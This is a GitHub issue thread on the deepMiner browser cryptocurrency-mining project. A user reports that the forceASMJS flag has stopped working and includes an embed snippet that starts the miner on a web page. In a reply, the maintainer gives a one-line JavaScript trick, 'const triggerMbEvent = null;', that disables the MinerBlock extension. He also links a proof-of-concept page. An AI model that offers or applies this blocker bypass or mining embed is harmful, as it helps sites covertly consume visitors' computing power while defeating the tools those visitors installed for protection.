### ISSUE TITLE
forceASMJS does not work anymore

### ISSUE THREAD

**Issue by JBelinchon** [deepwn/deepMiner#38]
## Check list

- [ ] Ask for HELP.

- [X ] Report a BUG.

- [ ] Have an IDEA.

- [ ] Already check [README.md](https://github.com/deepwn/deepMiner/blob/master/README.md) but not helpful.

## Issue info

Using this code:

        <script src="//%deepMiner_domain%/deepMiner.min.js"></script>
        <script>
                var addr = 'deepMiner';
                var miner = new deepMiner.Anonymous(addr, {
                        autoThreads: true,
                        forceASMJS: true
                });
                miner.start();

the flag forceASMJS does not have any effect anymore.

## OS & Browser

Any

## LOG / POC

- [ ] LOG

- [ ] POC

```text
code overwrite here...
```

## More Information

overwrite here...

## PS:

* Please set tag at first in title: `HELP` / `BUG` / `IDEA` like `[BUG] UAF found blablabla...`

* Sorry if reply slowly. Because I'm live in China. `UTC+8` in my life. (Reply when wake up as soon)

* At last delete this `PS` hints !!! Thanks for open this issue ;)

**Comment by evil7** [comment]
OK. I'll check that after day shift. 
TODO:
* test if `ASMJS` not working anymore I'll remove it.
* <del>check the banned list in `MinerBlock`</del>. And bypass the <https://github.com/xd4rker/MinerBlock/blob/master/js/minerkill.js>

PS: I can do NOT even a change with my codes. you JUST need `const` a var use his function name when site document loading in the site at first. Not big deal dude. 

1. It's start checking which Miner in site at document done loading. And next is it. <https://github.com/xd4rker/MinerBlock/blob/master/manifest.json#L15>
1. And so sad. It's just a little function in <https://github.com/xd4rker/MinerBlock/blob/master/js/minerkill.js#L3>

So that, you can add this in your site in `<script>` part for do block this "block":

```javascript
const triggerMbEvent = null;
```

<https://geekc.cc/demo.html> (tmp POC page here)
That it. :) Good luck.

**Comment by evil7** [comment]
I have see that some `youtube.com` banned host in your project.
Are you a some Ad-block developer too? :)

That's my pleasure to have some chance with you if you do.
And I'll close others issues what problems in same.
Thx for your feedback again
